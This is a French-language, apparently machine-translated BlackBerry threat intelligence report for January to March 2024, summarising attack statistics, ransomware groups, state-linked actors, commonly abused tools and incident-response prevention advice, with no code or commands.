Rapport mondial de veille sur les menaces

Édition de juin 2024

Période de référence : 1er janvier - 31 mars 2024

Des renseignements utiles qui comptent

Ce rapport BlackBerry fournit un examen complet du paysage mondial des menaces pour la période allant de janvier à mars 2024. Les points forts du rapport sont les suivants :

Nous avons observé plus de 630 000 hachages malveillants, soit une augmentation de plus de 40 % par minute par rapport à la période précédente.

Pour en savoir plus, consultez lasection Total des attaques au cours de cette période.

60 % des attaques ont visé des infrastructures critiques. Parmi celles-ci, 40 % visaient le secteur financier.

Pour en savoir plus, consultez la page Infrastructures critiques critiques.

56 % des CVE ont reçu une note de 7,0 ou plus (10 étant la note la plus élevée). Les CVE ont été rapidement utilisés dans toutes les formes de logiciels malveillants, en particulier les ransomwares et les voleurs d'informations.

Pour en savoir plus, consultez lasection Common Vulnerabilities and Exposures (Vulnérabilités et expositions courantes).

Nouvelle section sur les ransomwares : Nous avons ajouté une nouvelle section sur les principaux groupes de ransomwares dans le monde et sur les ransomwares les plus actifs au cours de cette période.

Pour en savoir plus, consultez la section "Who's Who in Ransomware".

Les rapports de veille sur les menaces mondiales ( BlackBerry® Global Threat Intelligence Reports) sont publiés tous les trois mois. Ces mises à jour fréquentes permettent aux RSSI et autres décideurs clés de rester informés des menaces et des défis les plus récents en matière de cybersécurité dans leur secteur d'activité et leur zone géographique.

Ce rapport est l'aboutissement des recherches, des analyses et des conclusions de notre équipe Cyber Threat Intelligence (CTI), de notre équipe Incident Response (IR) et des spécialistes de la sécurité de notre division CylanceMDR. Continuez à défiler pour en savoir plus, télécharger le pdf ou lire la note de synthèse.

Nombre total d'attaques au cours de cette période

De janvier à mars 2024, les solutions de cybersécurité deBlackBerry ont arrêté plus de 3 100 000 cyberattaques, ce qui équivaut à plus de 37 000 cyberattaques arrêtées par jour. En outre, nous avons observé une moyenne de 7 500 échantillons uniques de logiciels malveillants par jour ciblant notre base de clients.
Figure 1 : Hachures uniques de logiciels malveillants par minute rencontrée. (*La période septembre 2023 - décembre 2023 couvre 120 jours).

Comme vous le constaterez dans ce rapport, le nombre total d'attaques n'est pas nécessairement en corrélation avec le nombre de hachages uniques (nouveaux logiciels malveillants). Comme l'illustrent les figures 2 à 6 des deux sections suivantes, toutes les attaques n'utilisent pas des logiciels malveillants uniques. Cela dépend de la motivation de l'attaquant, de la complexité de l'attaque et de l'objectif - par exemple, le vol d'informations ou le vol financier.

Attaques par pays

Attaques stoppées

La figure 2 ci-dessous présente les cinq pays où les solutions de cybersécurité BlackBerry ont permis d'éviter le plus grand nombre de cyberattaques. C'est aux États-Unis que les organisations utilisant les solutions BlackBerry ont subi le plus grand nombre de tentatives d'attaques au cours de la période considérée. Dans la région Asie-Pacifique (APAC), le Japon, la Corée du Sud et l'Australie ont également subi un niveau élevé d'attaques, ce qui leur a valu de figurer dans notre top cinq. En Amérique latine (LATAM), les clients du Honduras ont été fortement ciblés, ce qui a valu à ce pays la cinquième place de notre liste.

 

Malware unique

Au cours de cette période, BlackBerry a observé une augmentation de plus de 40 % par minute des nouveaux hachages (logiciels malveillants uniques), par rapport à la période allant de septembre à décembre 2023 (figure 1). La figure 2 montre les cinq pays où les solutions de cybersécurité BlackBerry ont enregistré le plus grand nombre de hachages uniques de logiciels malveillants, les États-Unis recevant le plus grand nombre. La Corée du Sud, le Japon et l'Australie, dans la région Asie-Pacifique, ont conservé leur classement des trois derniers mois, tandis que le Brésil fait son entrée dans la liste.

Figure 2 : Attaques stoppées et logiciels malveillants uniques rencontrés, classés par pays.
Une fois encore, en comparant les figures 3a et 3b, vous constaterez que le nombre total d'attaques stoppées ne correspond pas nécessairement au nombre de hachages uniques enregistrés. Des outils et des tactiques uniques et personnalisés peuvent être mis au point par un acteur de la menace disposant de ressources importantes et souhaitant s'attaquer à une cible spécifique et de grande valeur, comme le directeur financier d'une entreprise donnée. Les "deepfakes" sont de plus en plus utilisés pour cibler des victimes spécifiques, comme l'utilisation d'un enregistrement vocal d'un PDG pour convaincre le directeur financier de l'entreprise de transférer de l'argent.
Figure 3a : Attaques stoppées, classées par ordre d'importance pour les cinq pays les plus touchés au cours de la période couverte par le présent rapport, par rapport au rapport précédent.
Figure 3b : Hachures uniques, classées selon les pays les plus touchés au cours de la période considérée, par rapport au rapport précédent.

Comme nous le verrons dans les sections suivantes, d'autres attaquants peuvent vouloir endommager une infrastructure physique, telle qu'un service public, en exploitant une vulnérabilité dans les systèmes de contrôle ou en infectant un appareil sur le réseau

Attaques par secteur d'activité

Comme dans notre précédent rapport, nous avons regroupé plusieurs secteurs industriels clés en deux sections : Infrastructures critiques et Entreprises commerciales.

Les infrastructures critiques, telles que définies par l'Agence pour la cybersécurité et la sécurité des infrastructures (CISA), englobent 16 secteurs, dont les soins de santé, l'administration, l'énergie, l'agriculture, la finance et la défense.

La numérisation croissante de ces secteurs rend leurs actifs plus vulnérables aux cybercriminels. Les acteurs de la menace exploitent activement les systèmes critiques par le biais de vulnérabilités telles que les erreurs de configuration des systèmes et les campagnes d'ingénierie sociale à l'encontre des employés.

Les entreprises commerciales comprennent l'industrie manufacturière, les biens d'équipement, les services commerciaux et professionnels et la vente au détail. Les entreprises sont toujours des cibles tentantes pour les cyberattaques, et l'utilisation accrue d'appareils connectés et de l'informatique en nuage a facilité l'intrusion dans leurs systèmes. Les attaquants sont également devenus plus sophistiqués, utilisant souvent l'ingénierie sociale pour obtenir des informations d'identification et distribuer des logiciels malveillants.

Figure 4 : Attaques sectorielles stoppées par rapport aux logiciels malveillants uniques.

Cyber Story Highlight : les banques internationales

Les banques mexicaines et les plateformes de crypto-monnaies ciblées par le RAT AllaKore

En janvier, les analystes en cybermenaces de BlackBerry ont découvert une campagne de longue haleine à motivation financière visant les banques mexicaines et les plateformes d'échange de crypto-monnaies à l'aide du RAT AllaKore, un outil d'accès à distance open-source modifié. Les acteurs de la menace ont utilisé des leurres imitant l'Institut mexicain de sécurité sociale (IMSS) et des documents légitimes pour distraire les utilisateurs pendant le processus d'installation, ce qui leur a permis de voler des identifiants bancaires et des informations d'authentification. Cette campagne est en cours depuis 2021 et se concentre sur les grandes entreprises mexicaines dont le chiffre d'affaires est supérieur à 100 millions de dollars. BlackBerry Les résultats de l'étude suggèrent que l'acteur de la menace est probablement basé en Amérique latine, étant donné l'utilisation d'adresses IP Mexico Starlink et d'instructions en espagnol dans la charge utile du RAT. Pour en savoir plus, lisez l'article complet sur notre blog.

Menaces sur les infrastructures critiques

D'après notre télémétrie interne, 60 % des cyberattaques spécifiques à un secteur d'activité auxquelles les solutions de cybersécurité de BlackBerry ont été confrontées visaient des infrastructures critiques. En outre, 32 % des hachages uniques de logiciels malveillants visaient des locataires d'infrastructures critiques.

CylanceENDPOINT et d'autres solutions de cybersécurité BlackBerry ont stoppé plus de 1,1 million d'attaques contre des secteurs industriels critiques, qui comprennent la finance, les soins de santé, le gouvernement et les services publics. Près de la moitié de ces 1,1 million d'attaques concernaient le secteur de la finance. En outre, les organisations gouvernementales et publiques ont subi la plus grande diversité d'attaques, avec plus de 36 % des hachages uniques ciblant ce secteur.

Figure 5 : Répartition des attaques stoppées et des logiciels malveillants uniques ciblant les infrastructures critiques.


BlackBerry a enregistré plusieurs familles de logiciels malveillants ciblant des infrastructures critiques dans le monde entier. Par exemple, le célèbre voleur d'informations LummaStealer a été observé en ciblant spécifiquement les secteurs de l'alimentation et de l'agriculture en Amérique latine et le secteur de l'énergie dans la région APAC. Parmi les menaces notables observées au cours de la période couverte par ce rapport, citons

  • 8Base ransomware: Opération de ransomware dans le secteur de la santé
  • Amadey (Amadey Bot): Réseau de zombies multifonctionnel pour les installations gouvernementales
  • Buhti: Opération Ransomware | Immobilier d'entreprise
  • LummaStealer (LummaC2): Secteur de l'alimentation et de l'agriculture (LATAM) et secteur de l'énergie (APAC)
  • PrivateLoader: Famille de téléchargeurs | Secteur de l'énergie
  • Remcos (RemcosRAT): Outil d'accès à distance (RAT) de qualité commerciale | Secteur de l'alimentation et de l'agriculture
  • Vidar (VidarStealer): Infopresseurs sur les matières premières | Divers secteurs :
    • Le secteur de l'énergie dans les pays de l'APAC
    • Le secteur des technologies de l'information dans les pays du LATAM
    • Le secteur des services financiers en Amérique du Nord
    • Le secteur des installations gouvernementales en Europe, au Moyen-Orient et en Afrique (EMEA)

Des informations détaillées sur ces menaces pesant sur les infrastructures critiques sont disponibles en annexe.

Figure 6 : Principales menaces pesant sur les infrastructures critiques, par région.


Menaces extérieures pesant sur les infrastructures critiques

Les menaces externes sont des cyberattaques enregistrées en dehors de la télémétrie interne de BlackBerry. Au cours de la dernière période de référence, le paysage mondial des menaces a connu un certain nombre d'attaques notables contre des infrastructures critiques.

Les conséquences de la faille survenue fin 2023 à l'Idaho National Laboratory (INL), un centre de recherche du ministère américain de l'énergie, se poursuivent. Des pirates ont pénétré dans la plateforme de gestion des ressources humaines Oracle HCM, basée sur le cloud, et ont siphonné les données personnelles de plus de 45 000 personnes. Le groupe hacktiviste SiegedSec a revendiqué l'attaque dans les semaines qui ont suivi et a publié une partie des données volées sur un forum de fuites en ligne. La figure 7 présente une chronologie des menaces notables contre les infrastructures critiques qui se sont produites au cours de la période couverte par le présent rapport.

Figure 7 : Attaques externes notables contre des infrastructures critiques.

Points forts de la cyberhistoire : infrastructure, réseaux privés virtuels et confiance zéro

Une directive d'urgence révèle qu'il est peut-être temps de remplacer les VPN

La fonctionnalité de base des réseaux privés virtuels (VPN) est restée largement inchangée depuis leur création en 1996, mais les récentes violations de sécurité très médiatisées et les directives gouvernementales suggèrent qu'il est peut-être temps de reconsidérer leur utilisation.

L'un des principaux problèmes est le modèle "trust but verify" des VPN, qui accorde intrinsèquement la confiance aux utilisateurs à l'intérieur du périmètre du réseau, ce qui les rend vulnérables aux cyberattaques. Soulignant ce risque, l'Agence pour la cybersécurité et la sécurité des infrastructures (CISA) a récemment publié des directives d'urgence concernant les vulnérabilités critiques des VPN, appelant à une déconnexion rapide des produits à risque. Lisez l'article complet sur notre blog.

Menaces pour les entreprises commerciales

Tout comme les industries sont touchées par les menaces de cybersécurité, les entreprises individuelles luttent également contre les cyberattaques, d'autant plus qu'elles ont tendance à s'appuyer davantage sur l'infrastructure numérique pour les finances, les communications, les ventes, l'approvisionnement et d'autres opérations commerciales. Toutes les entreprises, des start-ups aux conglomérats multinationaux, sont exposées aux cybermenaces, en particulier aux ransomwares.

Au cours de la dernière période de référence, les solutions de cybersécurité de BlackBerry ont bloqué 700 000 attaques ciblant des industries du secteur des entreprises commerciales.

D'après notre télémétrie interne, par rapport à la période précédente, les entreprises commerciales ont vu :

  • une augmentation de deux pour cent du nombre d'attaques auxquelles ils ont été confrontés.
  • une augmentation de 10 % des hachages uniques rencontrés.
Figure 8 : Attaques stoppées et logiciels malveillants uniques dans le secteur des entreprises commerciales.


Les entreprises commerciales sont menacées par des voleurs d'informations vendus par le biais d'opérations de logiciels malveillants en tant que service (MaaS). Souvent, ces menaces déploient des logiciels malveillants supplémentaires sur l'appareil de la victime. Ils continuent d'évoluer dans une course aux armements cybernétiques pour contourner les produits de sécurité et les logiciels antivirus traditionnels. Les logiciels malveillants les plus répandus relevés dans la télémétrie de BlackBerry sont les suivants :

  • RedLine (voleur de RedLine) : voleur d'infos
  • SmokeLoader : Logiciel malveillant polyvalent couramment utilisé
  • PrivateLoader : Facilitateur de logiciels malveillants
  • RaccoonStealer : MaaS infostealer
  • LummaStealer (LummaC2): voleur d'informations sur les logiciels malveillants

Des informations détaillées sur ces menaces pesant sur les entreprises commerciales sont disponibles en annexe.

Figure 9 : Menaces prévalentes pour les entreprises commerciales par région.


Menaces externes auxquelles est confrontée l'entreprise commerciale

Les ransomwares sont un fléau pour les organisations de toutes tailles et de toutes orientations. Parmi les exemples récents d'attaques par ransomware, on peut citer

  • VF Corporation - fabricant américain de marques de vêtements de sport bien connues telles que Timberland, The North Face et Vans - a été victime d'une attaque de ransomware par le gang de ransomware ALPHV en décembre 2023. Les attaquants ont volé les données de plus de 35 millions de clients, ce qui a entraîné des retards dans l'exécution des commandes et d'autres perturbations pendant la période très importante des fêtes de fin d'année.
  • Coop Värmland, une chaîne de supermarchés suédoise, a vu ses fêtes de fin d'année perturbées par une attaque de ransomware perpétrée par le gang de ransomware Cactus.
  • Un célèbre fabricant allemand, ThyssenKrupp, a été victime d'une brèche dans sa subdivision automobile en février 2024. L'entreprise a déclaré par la suite qu'il s'agissait d'une attaque de ransomware qui avait échoué.
  • En mars, le groupe de ransomware Stormous a attaqué la brasserie belge Duvel Moortgat, qui produit plus de 20 marques de bière, et a volé 88 Go de données.

Qui est qui en matière de ransomware ?

Comme le montrent les événements ci-dessus, les ransomwares ont constitué une menace prépondérante sur l'ensemble dusite BlackBerry Global Threat Intelligence Report (Rapport mondial de veille sur les menaces). Pour ce rapport, nous avons introduit une section spécifique sur les groupes de ransomwares actifs au cours de cette période.

Le ransomware est un outil universel adopté par les cybercriminels et les syndicats organisés, qui ciblent des victimes dans tous les secteurs d'activité à travers le monde. La plupart de ces groupes sont motivés par des raisons financières ; ils adaptent rapidement de nouvelles tactiques et techniques pour échapper aux défenses traditionnelles de la cybersécurité et exploiteront rapidement toute nouvelle faille de sécurité.

Les ransomwares ciblent de plus en plus les organismes de santé, une tendance inquiétante. La santé est un secteur rentable pour les groupes de ransomwares en raison de la numérisation croissante des dossiers médicaux et des graves conséquences qui peuvent survenir si ces services sont interrompus. Avec des attaques notables dans le monde entier au cours de cette période, ces syndicats agressifs peuvent mettre des vies en danger et restreindre ou couper l'accès des travailleurs de la santé aux données cruciales des informations personnelles identifiables (PII) des patients. 

Les attaques contre les soins de santé peuvent avoir de graves répercussions, en paralysant les hôpitaux, les cliniques, les pharmacies et les dispensaires, en empêchant les patients d'obtenir des médicaments vitaux, en provoquant le réacheminement des ambulances et en perturbant la programmation des procédures médicales. Parmi les conséquences secondaires, on peut citer les fuites de données et la vente d'informations sensibles sur les patients sur le dark web. C'est pourquoi nous prévoyons que les soins de santé continueront d'être fortement ciblés, à la fois publiquement et en privé, tout au long de l'année 2024.

Principaux acteurs de la lutte contre les rançongiciels au cours de la période considérée

Voici les groupes de menaces de ransomware les plus importants du monde entier qui ont été actifs au cours de la période considérée :

Figure 10 : Principaux groupes/familles de ransomwares actifs entre janvier et mars 2024.


Hunters International
Hunters International, un syndicat du crime spécialisé dans les ransomwares en tant que service (RaaS) qui opère depuis la fin de l'année 2023, s'est fait connaître au début de l'année 2024. Ce groupe est peut-être une émanation du
groupe de ransomwares Hive, qui a été démantelé par les forces de l'ordre au début de l'année 2023. Ce groupe utilise un double système d'extorsion qui consiste d'abord à crypter les données de la victime pour obtenir une rançon, puis à exiger davantage d'argent en menaçant de publier les données volées. Hunters International est actuellement actif dans le monde entier.

8Base
Observé initialement en 2022, le groupe de ransomwares 8Base s'est imposé à la fin de l'année 2023. Ce groupe prolifique utilise une variété de tactiques, de techniques et de procédures (TTP) et peut être très opportuniste. Le groupe est souvent prompt à exploiter les vulnérabilités récemment divulguées et utilise divers ransomwares, dont
Phobos

LockBit
LockBit, un groupe de ransomware basé en Russie, est spécialisé dans la fourniture de RaaS via son malware éponyme. Découvert en 2020, le ransomware
LockBit est devenu l'un des groupes de ransomware les plus agressifs. Parmi les aspects de ce logiciel, on peut citer

  • Outils personnalisés pour exfiltrer les données des victimes avant le chiffrement et les héberger via un site de fuite sur le dark web.
  • S'adresse principalement aux victimes d'Amérique du Nord et, accessoirement, à celles de la région Amérique latine et Caraïbes.
  • Emploie une double stratégie d'extorsion.

En février 2024, l'opération Cronos, une opération internationale d'application de la loi, a perturbé les opérations de LockBit. Toutefois, LockBit semble avoir rebondi depuis et reste un acteur majeur dans le domaine des ransomwares.

Play
Observé initialement en 2022,
Play est un groupe de ransomware à extorsion multiple qui héberge les données volées sur des sites basés sur TOR qui permettent une communication anonyme, menaçant de divulguer les données si le paiement de la rançon n'est pas effectué. Play cible souvent les petites et moyennes entreprises (PME), principalement en Amérique du Nord, mais aussi dans la région EMEA au cours de la période couverte par le présent rapport. Le groupe utilise principalement des outils prêts à l'emploi tels que Cobalt Strike, Empire et Mimikatz pour la découverte et les TTP de mouvement latéral. Le groupe a également utilisé Grixba, un outil personnalisé de reconnaissance et de vol d'informations utilisé avant l'exécution d'un ransomware.

BianLian
BianLian est un ransomware basé sur GoLang qui sévit depuis 2022. Le groupe associé a été actif au cours de la période considérée, ciblant principalement les victimes basées en Amérique du Nord. Comme de nombreux groupes de ransomwares,
BianLian exploite largement les vulnérabilités récemment divulguées, ciblant souvent les petites entreprises dans un certain nombre de secteurs d'activité. Il utilise divers outils prêts à l'emploi, notamment PingCastle, Advance Port Scanner et SharpShares, pour prendre pied sur un système cible avant d'exfiltrer des données sensibles et d'exécuter un ransomware. Ces données volées sont ensuite utilisées comme tactique d'extorsion jusqu'à ce que la rançon soit payée.

ALPHV
Souvent appelée
BlackCat ou Noberus, ALPHV est une opération RaaS qui existe depuis la fin de l'année 2021. Le groupe de menace derrière ALPHV est très sophistiqué et utilise le langage de programmation Rust pour cibler les systèmes d'exploitation Windows, Linux et VMWare. ALPHV a tendance à cibler les victimes nord-américaines.

Cyber Story Highlight : Ransomware et soins de santé

12 jours sans revenus : Les retombées du ransomware se poursuivent dans le secteur de la santé

En mars, le secteur de la santé a subi une attaque de ransomware "sans précédent" qui a perturbé les activités des hôpitaux et des pharmacies, selon l'American Hospital Association (AHA). L'attaque contre Change Healthcare, qui traite 15 milliards de transactions de soins de santé par an, a gravement affecté les services de soins aux patients tels que l'aide à la décision clinique et les opérations pharmaceutiques. Cette perturbation a entraîné une paralysie des revenus pendant 12 jours pour les cabinets médicaux touchés et a laissé les patients dans l'impossibilité d'obtenir des ordonnances vitales. Alors que le Bureau des droits civils du ministère américain de la santé et des services sociaux mène actuellement une enquête, les dernières données révèlent une augmentation significative des cyber-menaces, avec une hausse de 256 % des grandes brèches de piratage au cours des cinq dernières années. Cet incident souligne la nécessité de renforcer les mesures de cybersécurité dans le secteur des soins de santé. Pour une exploration détaillée de cette question urgente, lisez l'article complet sur notre blog.

Analyse géopolitique et commentaires

Les conflits géopolitiques sont de plus en plus souvent à l'origine de cyberattaques. Les technologies numériques peuvent être de puissants outils au service du bien, mais elles peuvent aussi être utilisées de manière abusive par des acteurs étatiques et non étatiques. Au cours des trois premiers mois de 2024, des législateurs d'Europe, d'Amérique du Nord et de la région Asie-Pacifique ont été victimes de campagnes ciblées de logiciels espions. Des acteurs menaçants se sont introduits dans les systèmes informatiques de plusieurs ministères, ont compromis des systèmes militaires et ont perturbé des infrastructures essentielles dans le monde entier.

Si les motifs de ces intrusions sont souvent complexes et opaques, les incidents récents les plus significatifs ont impliqué des clivages géopolitiques majeurs tels que l'invasion de l'Ukraine par la Russie, l'agression croissante entre Israël et l'Iran, et les tensions actuelles en mer de Chine méridionale et dans la région indo-pacifique.

En Ukraine, les dimensions cybernétiques de la guerre se poursuivent. Contrairement aux normes internationales régissant la conduite légale dans le cyberespace, les attaques lancées contre l'Ukraine ne font toujours pas la distinction entre les infrastructures civiles et militaires. En janvier, des agents russes se sont connectés à des webcams résidentielles à Kiev, prétendument pour recueillir des informations sur les systèmes de défense aérienne de la ville avant de lancer une attaque de missiles sur la ville. Selon les rapports, les attaquants ont manipulé les angles des caméras pour recueillir des informations sur les infrastructures critiques situées à proximité afin de mieux cibler les missiles.

Des acteurs russes de la cybermenace ont également été associés à une attaque contre le plus grand fournisseur de téléphonie mobile d'Ukraine, Kyivstar, qui a détruit d'importantes infrastructures et coupé l'accès à 24 millions de clients en Ukraine. Cette attaque a eu lieu quelques heures avant que le président Biden ne rencontre le président Zelenskyy à Washington D.C. Des législateurs de l'UE ont également découvert que leurs téléphones avaient été infectés par des logiciels espions. Nombre d'entre eux étaient membres de la sous-commission "sécurité et défense" du Parlement européen, chargée de formuler des recommandations sur le soutien de l'UE à l'Ukraine. En mars, des attaquants russes ont également intercepté des conversations entre des responsables militaires allemands au sujet d'un éventuel soutien militaire à l'Ukraine, ce qui renforce la nécessité de protéger les communications contre des tentatives d'espionnage accrues.

L'escalade des activités militaires entre l'Iran et Israël s'est accompagnée de cyberattaques contre les sites du gouvernement israélien. En représailles, les acteurs de la menace israéliens ont perturbé 70 % des stations-service en Iran. Dans le même temps, les États-Unis ont lancé une cyberattaque contre un navire espion militaire iranien en mer Rouge qui partageait des renseignements avec les rebelles houthis.

Dans la région indo-pacifique, les cyberattaques et les campagnes d'espionnage attribuées à des groupes soutenus par la Chine ont continué à se multiplier. Le Conseil d'examen de la cybersécurité du ministère américain de la sécurité intérieure a publié un rapport important sur l'incident Microsoft Online Exchange de l'été 2023, qui décrit en détail comment des attaquants soutenus par la Chine ont volé le code source de Microsoft. Le groupe de menace Storm-0558 a compromis des employés et des fonctionnaires du Département d'État américain, du Département du commerce américain, de la Chambre des représentants des États-Unis et de plusieurs ministères du Royaume-Uni. Selon le rapport, l'acteur de la menace a réussi à télécharger environ 60 000 courriels du seul Département d'État.

Il ne s'agit pas d'un incident isolé. En mars 2024, le ministère américain de la justice et le FBI ont révélé que des attaquants chinois avaient pris pour cible plusieurs membres britanniques, européens, américains et canadiens de l'Alliance interparlementaire sur la Chine.

Comme indiqué précédemment, les attaques contre les infrastructures critiques ont augmenté, en particulier dans les secteurs de la finance et de la santé. Au cours des trois premiers mois de 2024, une violation massive des données d'une compagnie d'assurance maladie française a entraîné la fuite d'informations personnelles sensibles. Au Canada, le Centre d'analyse des opérations et déclarations financières (CANAFE) a fermé ses systèmes à la suite d'un cyberincident. Le gouvernement canadien a réagi en allouant 27 millions de dollars canadiens à l'amélioration de la cyber-résilience du CANTRAC et à la mise en place de mesures de protection de la sécurité des données.

Les gouvernements du monde entier investissent dans le renforcement de la cybersécurité face à l'augmentation du cyberespionnage et des tentatives de cyberattaque. Le Canada a récemment annoncé des niveaux d'investissement historiques dans ses cyberdéfenses, et le Royaume-Uni a porté ses dépenses de défense à 2,5 % de son PIB. La cybersécurité reste l'un des principaux risques pour les gouvernements et les acteurs du secteur privé, et cette tendance se poursuivra probablement tant que les tensions géopolitiques continueront à augmenter.

Observations sur la réponse aux incidents

La réponse aux incidents (RI) est une approche de la gestion des cyberattaques et des incidents de cybersécurité au niveau de l'entreprise. L'objectif de la réponse aux incidents est de contenir et de minimiser rapidement les dommages causés par une violation, ainsi que de réduire le temps et les coûts de rétablissement. Chaque organisation a besoin d'un plan de RI et d'un service de RI interne ou tiers. BlackBerry® Cybersecurity Services - qui comprend la réponse aux cyberincidents, la réponse aux violations de données, la réponse à la compromission des courriels d'entreprise, la réponse aux ransomwares et la criminalistique numérique - fournit des plans de réponse rapide aux incidents pour aider à atténuer l'impact de toute cyberattaque et garantir que la récupération numérique suit les meilleures pratiques.
Figure 11 : BlackBerry Répartition de l'engagement en matière de RI.


Observations de l'équipe de réponse aux incidents BlackBerry

Voici un résumé des types de missions de RI auxquelles l'équipe BlackBerry a répondu, ainsi que des mesures de sécurité que les organisations peuvent prendre pour prévenir de telles violations.

  • Intrusion dans le réseau : Incidents dans lesquels le vecteur d'infection initial était un système vulnérable orienté vers l'internet, tel qu'un serveur web ou un appareil de réseau privé virtuel (VPN). Dans certains cas, la violation a conduit au déploiement d'un ransomware dans l'environnement de la cible et à l'exfiltration de données.
    • Prévention : Appliquer les mises à jour de sécurité à tous les systèmes exposés à Internet en temps opportun. (MITRE - External Remote Services, T1133.)
  • Manquement d'initié : Un employé actuel et/ou un ancien employé a accédé aux ressources de l'entreprise sans autorisation.  
    • Prévention : Mettre en place des contrôles de sécurité par authentification forte sur tous les systèmes. Mettre en œuvre des procédures formelles d'intégration des employés de l'entreprise. (MITRE - Comptes valides : Comptes dans le nuage, T1078.004.)
  • Ransomware : Dix pour cent de tous les incidents auxquels il a été répondu étaient dus à des ransomwares.
    • Prévention : Apporter en temps utile des correctifs aux services orientés vers l'internet, tels que le courrier électronique, les réseaux privés virtuels et les serveurs web. Cela peut empêcher un acteur de la menace d'accéder à des objectifs et d'y donner suite, comme le déploiement d'un ransomware, après avoir accédé à un réseau d'entreprise par le biais d'un appareil ou d'un système vulnérable. (MITRE - External Remote Services, T1133.)
    • Prévention : Veiller à ce que l'organisation dispose de deux copies de toutes les données critiques stockées sur deux supports différents de la source de données d'origine, avec au moins une copie hors site.

La détection, l'endiguement et le rétablissement d'un incident de cybersécurité nécessitent une détection et une réponse rapides pour limiter les dommages. Il est impératif que les organisations disposent d'un plan de réponse aux incidents bien documenté, ainsi que d'un personnel formé et de ressources prêtes à prendre des mesures immédiates dès les premiers signes d'une violation potentielle. Cela permet aux équipes de sécurité de détecter les problèmes le plus tôt possible, de contenir et d'éradiquer rapidement les menaces et d'atténuer l'impact sur la réputation de l'entreprise et de la marque, les pertes financières et les risques juridiques pour l'organisation.

Acteurs de la menace et outils

Acteurs de la menace

Des dizaines de groupes de menace ont lancé des cyberattaques au cours des trois premiers mois de 2024. Nous avons mis en évidence les attaques les plus percutantes.

LockBit

LockBit est un groupe cybercriminel affilié à la Russie. Les opérateurs du groupe entretiennent et améliorent avec diligence leur ransomware éponyme, en supervisant les négociations et en orchestrant son déploiement une fois qu'une intrusion réussie a eu lieu. Employant une double stratégie d'extorsion, le ransomware LockBit ne se contente pas de chiffrer les données locales pour restreindre l'accès des victimes, il exfiltre également des informations sensibles et menace de les exposer publiquement si une rançon n'est pas versée.

En février, le NCA, le FBI et Europol, dans le cadre d'un effort mondial coordonné baptisé "Operation Cronos", ont mis en place un système de surveillance de l'environnement.Opération Cronosont collaboré avec les services répressifs de dix pays pour prendre le contrôle de l'infrastructure et du site de fuite du groupe LockBit, recueillir des informations sur ses serveurs, procéder à des arrestations et imposer des sanctions.

Cependant, moins d'une semaine plus tard, le groupe de ransomware s'est regroupé et a repris ses attaques, en utilisant des cryptomonnaies mises à jour et des notes de rançon qui dirigent les victimes vers de nouveaux serveurs à la suite de l'interruption de l'action des forces de l'ordre.

LockBit a revendiqué la responsabilité de cyberattaques contre divers réseaux, dont le réseau hospitalier Capital Health. Dans les deux cas, ils ont menacé de divulguer des données confidentielles si une rançon n'était pas payée rapidement.

Rhysida

Rhysida est un groupe RaaS relativement nouveau qui a été observé pour la première fois vers la fin du mois de mai 2023. Malgré son apparition relativement récente, le groupe s'est rapidement imposé comme une menace viable en matière de ransomware. Sa première attaque très médiatisée a visé l'armée chilienne, marquant le début d'une augmentation des attaques de ransomware contre les institutions gouvernementales d'Amérique latine.
Le groupe Rhysida a également attaqué le détaillant de yachts MarineMax. Le groupe Rhysida a exfiltré une quantité limitée de données de leur environnement, notamment des informations sur les clients et les employés, y compris des IPI qui peuvent être utilisées pour l'usurpation d'identité. Ces données volées sont désormais proposées à la vente sur le dark web pour 15 BTC, soit environ 1 013 556 dollars américains à l'heure où nous écrivons ces lignes. En outre, Rhysida a publié des captures d'écran censées montrer les documents financiers de MarineMax, ainsi que des images de permis de conduire et de passeports d'employés, sur son site de fuite du dark web.

APT29

APT29, également connu sous le nom de Cozy Bear, Midnight Blizzard ou NOBELIUM, est un groupe de menace attribué au Service de renseignement extérieur de la Russie (SVR). APT29 est connu pour cibler les gouvernements, les organisations politiques et de recherche, ainsi que les infrastructures critiques.

La CISA a récemment averti qu'APT29 avait élargi son champ d'action à d'autres secteurs d'activité et à d'autres administrations locales. Connu pour utiliser un large éventail de logiciels malveillants personnalisés, le groupe de menace a également récemment ciblé des services en nuage en utilisant des comptes de service compromis ou des jetons d'authentification volés.

Au cours de cette période, APT29 a été observé en train d'accéder à un compte de locataire test de Microsoft suite à une attaque par pulvérisation de mot de passe, puis de créer des applications OAuth malveillantes pour accéder à des comptes de messagerie d'entreprise. En outre, ils ont ciblé des partis politiques allemands avec WINELOADER, une porte dérobée observée pour la première fois en janvier 2024.

Akira

Apparu pour la première fois au début de l'année 2023, le ransomware Akira a été observé en train de cibler des organisations de tous les secteurs d'activité. En accédant aux réseaux à l'aide de services VPN mal configurés ou vulnérables, de RDP publics, de spear-phishing ou d'informations d'identification compromises, ils tentent de créer des comptes de domaine ou de trouver des informations d'identification pour une escalade des privilèges ou un déplacement latéral au sein des réseaux.

Akira est connu pour utiliser des outils tels que :

  • AdFind pour l'interrogation d'Active Directory.
  • Mimikatz et LaZagne pour l'accès aux informations d'identification.
  • Ngrok pour l'accès à des réseaux derrière des pare-feu ou d'autres mesures de sécurité.
  • AnyDesk pour l'accès à distance.
  • Scanner IP avancé pour localiser les appareils sur un réseau.

Principaux outils utilisés par les acteurs de la menace

Mimikatz

Mimikatz est reconnu pour sa capacité à extraire des informations d'identification sensibles du processus Local Security Authority Subsystem Service (LSASS) sur les systèmes Windows. 
Ce processus sert de référentiel pour les informations d'identification des utilisateurs après l'ouverture de session, ce qui en fait une cible de choix pour les testeurs de pénétration éthiques et les acteurs malveillants. Mimikatz est un utilitaire très répandu pour évaluer la robustesse des réseaux Windows. Les testeurs de pénétration légitimes peuvent utiliser Mimikatz pour découvrir des vulnérabilités critiques, tandis que les acteurs malveillants peuvent l'utiliser pour escalader les privilèges ou se déplacer latéralement à l'intérieur des réseaux. Des groupes de menace tels que LockBit et Phobos exploitent ses capacités pour exécuter des cyberattaques sophistiquées.

Grève du cobalt

Cobalt Strike, un cadre de simulation d'adversaires, reproduit la présence persistante d'acteurs de la menace dans des environnements de réseau. L'outil comporte deux éléments essentiels : un agent (Beacon) et un serveur (Team Server). Le serveur Team, qui fonctionne comme un serveur C2 à long terme hébergé sur Internet, maintient une communication constante avec les charges utiles Beacon déployées sur des machines compromises.
